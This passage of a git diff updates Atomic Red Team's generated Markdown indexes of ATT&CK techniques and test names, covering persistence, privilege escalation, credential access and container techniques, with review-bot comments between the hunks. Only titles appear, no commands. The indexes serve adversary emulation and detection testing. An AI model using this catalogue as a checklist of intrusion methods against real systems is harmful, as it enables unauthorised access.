DLL](../../T1556.002/T1556.002.md) + - Atomic Test #1: Install and Register Password Filter DLL [windows] +- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.009 Path Interception by 
Unquoted Path](../../T1574.009/T1574.009.md) + - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] +- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) + - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) + - Atomic Test #1: Reg Key Run [windows] + - Atomic Test #2: Reg Key RunOnce [windows] + - Atomic Test #3: PowerShell Registry RunOnce [windows] + - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] + - Atomic Test #5: Suspicious jse file run from startup Folder [windows] + - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] +- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - 
Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) + - Atomic Test #1: Scheduled Task Startup Script [windows] + - Atomic Test #2: Scheduled task Local [windows] + - Atomic Test #3: Scheduled task Remote [windows] + - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] + - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) + - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] +- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) + - Atomic Test #1: Modify SSP configuration in registry [windows] +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) + - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] +- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) + - Atomic Test #1: Shortcut Modification [windows] + - Atomic Test #2: Create shortcut to cmd in startup folders [windows] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.003 Time Providers [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md) + - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1505.003 Web Shell](../../T1505.003/T1505.003.md) + - Atomic Test #1: Web Shell Written to Disk [windows] +- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) + - Atomic Test #1: Persistence via WMI Event Subscription [windows] +- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) + - Atomic Test #1: Modify Fax service to run PowerShell [windows] + - Atomic Test #2: Service Installation CMD [windows] + - Atomic Test #3: Service Installation PowerShell [windows] +- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # impact - [T1531 Account Access Removal](../../T1531/T1531.md) - Atomic Test #1: Change User Password - Windows [windows] 
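Review bot: several of the test names added in this persistence section carry typos and one pair is ambiguous: "admin priviliges" under T1078.001 and again under T1078.003, "Persistance with Event Monitor - emond" under T1546.014, and two tests under T1547.007 that are both named "Re-Opened Applications" (Atomic Test #1 and #2). Since this index is generated, the fix belongs in the atomic tests' source definitions rather than in the index, and the two T1547.007 tests should get distinct names so a reader can tell from the index what each one does.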
@@ -1071,6 +1103,7 @@ - T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.002 Domain Account](../../T1087.002/T1087.002.md) - Atomic Test #1: Enumerate all accounts (Domain) [windows] - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows] @@ -1102,6 +1135,7 @@ - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #1: Enumerate all accounts (Local) [linux] - Atomic Test #2: View sudoers access [linux, macos] @@ -1190,6 +1224,7 @@ - Atomic Test #9: Griffon Recon [windows] - Atomic Test #10: Environment variables discovery on windows [windows] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] 
@@ -1233,11 +1268,14 @@ - T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.005 Link Target [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -1245,7 +1283,10 @@ - T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -1305,10 +1346,16 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1609 Container Administration Command](../../T1609/T1609.md) + - Atomic Test #1: ExecIntoContainer [linux, macos] +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md) - Atomic Test #1: Execute Commands [windows] - Atomic Test #2: Execute PowerShell script via Word DDE [windows] @@ -1316,7 +1363,7 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.001 Launchctl](../../T1569.001/T1569.001.md) - Atomic Test #1: Launchctl [macos] - [T1053.004 Launchd](../../T1053.004/T1053.004.md) 
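Review bot: the @@ -1316 hunk renames T1059.007 from "JavaScript/JScript" to "JavaScript" and the @@ -1305 hunk adds new container techniques (T1609, T1053.007, T1610), but nothing in the index records which ATT&CK release these names and IDs were pulled from; a version line at the top of the index (or in the generator output) would make renames like this traceable when the index is regenerated. Separately, the unchanged context of the @@ -1102 hunk still shows "Nix File and Diectory Discovery" for T1083 test #3; that pre-existing typo is also best fixed in the test's source definition.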
@@ -1330,6 +1377,7 @@ - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] +- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 718a5e3a..24f9e6c5 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -1,121 +1,4 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1078.003 Local 
Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack 
Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505 Server 
Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # credential-access - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] 
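Review bot: the @@ -1,121 +1,4 hunk deletes the entire privilege-escalation and persistence sections from the top of linux-index.md, and the same sections are re-added further down the file (see the "+# privilege-escalation" and "+# persistence" hunks below), so the bulk of this diff is a tactic reordering rather than a content change. The real changes are buried inside the move: T1574.006 goes from "LD_PRELOAD" to "Dynamic Linker Hijacking", T1546.004 from ".bash_profile and .bashrc" to "Unix Shell Configuration Modification", T1525 from "Implant Container Image" to "Implant Internal Image", plus new entries such as T1053.007, T1611 and T1547.013. The generator should emit tactics in a deterministic order (for example alphabetical, or fixed kill-chain order) so that a regeneration diff shows only the entries that actually changed and reviewers can check the renames line by line.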
@@ -125,12 +8,15 @@ - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.007 Container API](../../T1552.007/T1552.007.md) + - Atomic Test #1: ListSecrets [macos, linux] - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #2: Extract passwords with grep [macos, linux] - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] @@ -142,6 +28,7 @@ - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) 
@@ -149,11 +36,13 @@ - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] - T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection 
@@ -199,12 +88,68 @@ - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546 Event Triggered Execution [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1055.014 VDSO Hijacking [CONTRIBUTE A 
